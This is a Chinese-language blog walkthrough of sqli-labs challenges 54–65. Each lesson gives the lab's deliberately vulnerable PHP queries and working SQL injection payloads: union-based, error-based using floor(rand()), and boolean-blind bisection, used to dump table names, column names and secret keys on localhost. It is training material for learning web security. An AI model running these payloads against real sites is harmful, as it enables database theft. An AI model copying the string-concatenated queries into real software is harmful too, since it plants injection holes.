SQLI-LAB 的 实战记录(Less 54 - Less 65)

  • Less - 54 Challenge-1
    • Test
    • Sourse Code
    • Solution
  • Less - 55 Challenge-2
    • Test
    • Sourse Code
    • Solution
  • Less - 56 Challenge-3
    • Test
    • Sourse Code
    • Solution
  • Less - 57 Challenge-4
    • Test
    • Sourse Code
    • Solution
  • Less - 58 Challenge-5
    • Test
    • Sourse Code
    • Solution
  • Less - 59 Challenge-6
    • Test
    • Sourse Code
    • Solution
  • Less - 60 Challenge-7
    • Test
    • Sourse Code
    • Solution
  • Less - 61 Challenge-8
    • Test
    • Sourse Code
    • Solution
  • Less - 62 Challenge-9
    • Test
    • Sourse Code
    • Solution
  • Less - 63 Challenge-10
    • Test
    • Sourse Code
    • Solution
  • Less - 64 Challenge-11
    • Test
    • Sourse Code
    • Solution
  • Less - 65 Challenge-12
    • Test
    • Sourse Code
    • Solution

以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。
因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。

Less - 54 Challenge-1

(第54节:挑战 - 1)

Test:

     http://localhost/sqli-lab/Less-54/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 10 attempts
注:数据库名:challenges 最多尝试次数:10

     http://localhost/sqli-lab/Less-54/index.php?id=1') union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-54/index.php?id=1' union select 1,2,3 --+

注:正常,id周围是单引号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
          //2x51x9lc2b

     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='2x51x9lc2b' --+
          //id,sessid,secret_QD6G,tryy

     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(secret_QD6G),group_concat(sessid) from challenges.2x51x9lc2b --+
          //t5OPJLdkJ60DsyF7T1ZL3rfD
          //140491cdf5b17300fc51147a33ae86bf

注:正则匹配直接暴表名,列名:
     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,table_name,column_name from information_schema.columns where column_name regexp '^secret_[A-Z]{4}$' limit 0,1;

Less - 55 Challenge-2

(第55节:挑战 - 2)

Test:

     http://localhost/sqli-lab/Less-55/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
注:数据库名:challenges 最多尝试次数:14

     http://localhost/sqli-lab/Less-55/index.php?id=1' union select 1,2,3 --+

     http://localhost/sqli-lab/Less-55/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-55/index.php?id=1" union select 1,2,3 --+

     http://localhost/sqli-lab/Less-55/index.php?id=1") union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-55/index.php?id=1) union select 1,2,3 --+

注:正常,id周围是一层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
          // tyqb9xz99r

     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='tyqb9xz99r' --+
          // id,sessid,secret_0LLE,tryy

     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(secret_0LLE),group_concat(sessid) from challenges.tyqb9xz99r --+
          // HvXC6g9NxUeGwZtpfdEYCtUO
          // 486412045b0a355f953e5aa5c8446bcb

Less - 56 Challenge-3

(第56节:挑战 - 3)

Test:

     http://localhost/sqli-lab/Less-56/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
注:数据库名:challenges 最多尝试次数:14

     http://localhost/sqli-lab/Less-56/index.php?id=1' union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-56/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-56/index.php?id=1" union select 1,2,3 --+

     http://localhost/sqli-lab/Less-56/index.php?id=1") union select 1,2,3 --+

注:正常,id周围是双引号和一层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
          // l1meh6v8xf

     http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l1meh6v8xf' --+
          // id,sessid,secret_ZIEU,tryy

     http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(secret_ZIEU),group_concat(sessid) from challenges.l1meh6v8xf --+
          //3zjx2Ef32x2clWJlRlS4n2wc
          // 2de68a7c5e3db6a836ab8f5f109416b8

Less - 57 Challenge-4

(第57节:挑战 - 4)

Test:

     http://localhost/sqli-lab/Less-57/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
注:数据库名:challenges 最多尝试次数:14

     http://localhost/sqli-lab/Less-57/index.php?id=1") union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-57/index.php?id=1' union select 1,2,3 --+

     http://localhost/sqli-lab/Less-57/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-57/index.php?id=1" union select 1,2,3 --+

注:正常,id周围是双引号

Sourse Code:

$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){   
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
          // la5spfxomc

     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='la5spfxomc' --+
          // id,sessid,secret_D2E9,tryy

     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(secret_D2E9),group_concat(sessid) from challenges.la5spfxomc --+
          // AkXpuSMRL2Mjnxbu6ChgdDkI
          // 2c26f9a59b0ba61233e6fc0af8e47f14

Less - 58 Challenge-5

(第58节:挑战 - 5)

Test:

     http://localhost/sqli-lab/Less-58/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注:数据库名:challenges 最多尝试次数:5

     http://localhost/sqli-lab/Less-58/index.php?id=1' union select 1,2,3 --+

注:正常

     http://localhost/sqli-lab/Less-58/index.php?id=1') union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘) union select 1,2,3 – ’ LIMIT 0,1’ at line 1
注:id周围是单引号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     print_r(mysql_error());  
}

Solution:

     http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //qrso3pw6sh::challenges::1

     http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='qrso3pw6sh' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_MV87,tryy::1

     http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(secret_MV87,0x3a, 0x3a) from challenges.qrso3pw6sh limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // 3XJM8hjFz6KNK5aoNUSApgRW::1

Less - 59 Challenge-6

(第59节:挑战 - 6)

Test:

     http://localhost/sqli-lab/Less-59/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注:数据库名:challenges 最多尝试次数:5

     http://localhost/sqli-lab/Less-59/index.php?id=1' union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” union select 1,2,3 – LIMIT 0,1’ at line 1
注:id周围没有符号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // b3ndcj1o8v::challenges::1

     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='b3ndcj1o8v' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_ZWS2,tryy::1

     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(secret_ZWS2 ,0x3a, 0x3a) from challenges.b3ndcj1o8v limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // zhEVMVgMavK0k92OSv8zmTTm::1

Less - 60 Challenge-7

(第60节:挑战 - 7)

Test:

     http://localhost/sqli-lab/Less-60/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注:数据库名:challenges 最多尝试次数:5

     http://localhost/sqli-lab/Less-60/index.php?id=1" union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘union select 1,2,3 – “) LIMIT 0,1’ at line 1
注:id周围是双引号和一层括号

Sourse Code:

$id = '("'.$id.'")';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){  
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     print_r(mysql_error());  
}

Solution:

     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //p9gd2w7p0n::challenges::1

     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='p9gd2w7p0n' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_THZK,tryy::1

     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(secret_THZK ,0x3a, 0x3a) from challenges.p9gd2w7p0n limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // OSpAsCGlNQ8qbUtTnEXHd0WL::1

Less - 61 Challenge-8

(第61节:挑战 - 8)

Test:

     http://localhost/sqli-lab/Less-61/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注:数据库名:challenges 最多尝试次数:5

     http://localhost/sqli-lab/Less-61/index.php?id=1' union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘union select 1,2,3 – ‘)) LIMIT 0,1’ at line 1
注:id周围是单引号和两层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //t44dfrest6::challenges::1

     http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='t44dfrest6' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_BN4M,tryy::1

     http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(secret_BN4M,0x3a, 0x3a) from challenges.t44dfrest6 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // dqlfs35mo8ZZlYKFZIvXboSe::1

Less - 62 Challenge-9

(第62节:挑战 - 9)

Test:

     http://localhost/sqli-lab/Less-62/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注:数据库名:challenges 最多尝试次数:130

     http://localhost/sqli-lab/Less-62/index.php?id=1' union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-62/index.php?id=1') union select 1,2,3 --+

注:正常,id周围是单引号和一层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 97 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 109 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 115 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 119 --+
          //表名 第一个字符:w
          // wlo99z7cua

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 16) = 16 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 4) = 4 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 2) = 2 --+
          //10110 = 22  ,列名中倒数第四个字符:V
          // secret_VUBV

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 64 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 53 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 50 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select secret_VUBV from wlo99z7cua limit 0,1),1,1)) %26 1) = 1 --+
          // key 的 第一个字符:1
          // 1kqTprKdfAt6VGFEoEcpYgjG

注:随机值
表名 10位 由 小写字母和数字 组成
secret_XXXX 后四位由 大写字母和数字 组成
key 24位 由 大小写字母和数字 组成


Less - 63 Challenge-10

(第63节:挑战 - 10)

Test:

     http://localhost/sqli-labess-63/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注:数据库名:challenges 最多尝试次数:130

     http://localhost/sqli-lab/Less-63/index.php?id=1') union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-63/index.php?id=1' union select 1,2,3 --+

注:正常,id周围是单引号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     //print_r(mysql_error());  
}

Solution:

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 64 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 96 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 77 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 70 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 73 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ord(substr((select secret_8FVY from  gelqg5ya7p limit 0,1),1,1)) %26 1) = 1 --+
          // key 的 第一个字符:G
          //  Gd65kBLDXbCY7wrwRq5jzM4l

Less - 64 Challenge-11

(第64节:挑战 - 11)

Test:

     http://localhost/sqli-lab/Less-64/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注:数据库名:challenges 最多尝试次数:130

     http://localhost/sqli-lab/Less-64/index.php?id=1' union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1" union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1") union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1) union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-64/index.php?id=1)) union select 1,2,3 --+

注:正常,id周围是两层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from  tsgl6i8osu limit 0,1) ,1,1))) > 64 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from  tsgl6i8osu limit 0,1) ,1,1))) > 97 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 109 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 106 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 104 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) = 103 --+
          // key 的 第一个字符:g
          //  gpu9QBywZI8jL2M7Uj6DDELa

Less - 65 Challenge-12

(第65节:挑战 - 12)

Test:

     http://localhost/sqli-lab/Less-65/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注:数据库名:challenges 最多尝试次数:130

     http://localhost/sqli-lab/Less-65/index.php?id=1" union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-65/index.php?id=1' union select 1,2,3 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") union select 1,2,3 --+

注:正常,id周围是双引号和一层括号

Sourse Code:

$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 64 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 97 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 77 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 84 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 88 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 85 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) = 87 --+
          // key 的 第一个字符:W
          // Wa0mYczFC0wFXygjAFaCA1Tb

你可能感兴趣的:(sql注入)